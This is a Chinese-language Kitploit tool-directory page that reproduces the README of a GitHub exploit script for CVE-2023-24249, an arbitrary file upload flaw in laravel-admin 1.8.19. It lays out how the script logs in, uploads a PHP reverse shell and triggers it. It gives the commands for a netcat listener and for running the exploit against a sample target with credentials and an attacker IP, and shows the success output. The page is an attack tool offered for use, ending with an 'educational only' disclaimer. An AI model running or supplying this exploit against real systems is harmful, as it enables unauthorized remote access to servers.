Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-24249-Exploit — CVE-2023-24249 的漏洞利用脚本——该漏洞允许通过文件上传和命令注入实现远程代码执行。 | Kitploit
工具/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

CVE-2023-24249 的漏洞利用脚本——该漏洞允许通过文件上传和命令注入实现远程代码执行。

查看仓库
912年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-24249 漏洞利用脚本

描述

本仓库包含针对 CVE-2023-24249 的漏洞利用脚本,该漏洞存在于 laravel-admin 1.8.19 版本中,属于严重漏洞。此漏洞允许任意文件上传,使攻击者能够通过构造的 PHP 文件执行任意代码。该利用脚本演示了攻击者如何向目标应用上传反向 Shell 并执行以获取远程访问权限。

漏洞详情

CVE-2023-24249 是 laravel-admin v1.8.19 中的一个任意文件上传漏洞。该漏洞允许攻击者上传并执行任意 PHP 文件,从而导致潜在的远程代码执行。

  • 基础评分:7.2 高危
  • 攻击向量:CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • 弱点枚举:CWE-434 - 危险类型文件的无限制上传

参考

  • 漏洞利用 - 第三方公告
  • Laravel Admin GitHub 仓库
  • Laravel Admin 官方网站

漏洞利用脚本

所提供的漏洞利用脚本可自动执行利用 CVE-2023-24249 的过程。具体步骤如下:

  1. 身份验证:使用提供的凭据登录目标应用。
  2. 上传反向 Shell:通过存在漏洞的文件上传功能上传 PHP 反向 Shell 脚本。
  3. 执行反向 Shell:向上传的反向 Shell 脚本发送 GET 请求以执行它,并建立与攻击者机器的反向连接。

环境要求

  • Python 3
  • requests 库
  • beautifulsoup4 库

使用 pip 安装所需库:

root@kitploit:~
pip install requests beautifulsoup4

使用方法

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. 在您的机器上启动监听器:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. 运行漏洞利用脚本:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    将 <TARGET_URL>、<USERNAME>、<PASSWORD>、<YOUR_IP> 和 <YOUR_PORT> 替换为适当的值:

    • <TARGET_URL>:目标应用的 URL。
    • <USERNAME>:用于身份验证的用户名。
    • <PASSWORD>:用于身份验证的密码。
    • <YOUR_IP>:用于接收反向 Shell 连接的 IP 地址。

示例

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

脚本输出

如果漏洞利用成功,脚本将输出:

root@kitploit:~
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

免责声明

此脚本仅供教育目的使用。未经明确许可,针对任何系统使用此脚本均属非法且不道德的行为。作者不对因使用此脚本而造成的任何滥用或损害承担责任。

下载工具
  • <YOUR_PORT>:您的监听器正在运行的端口。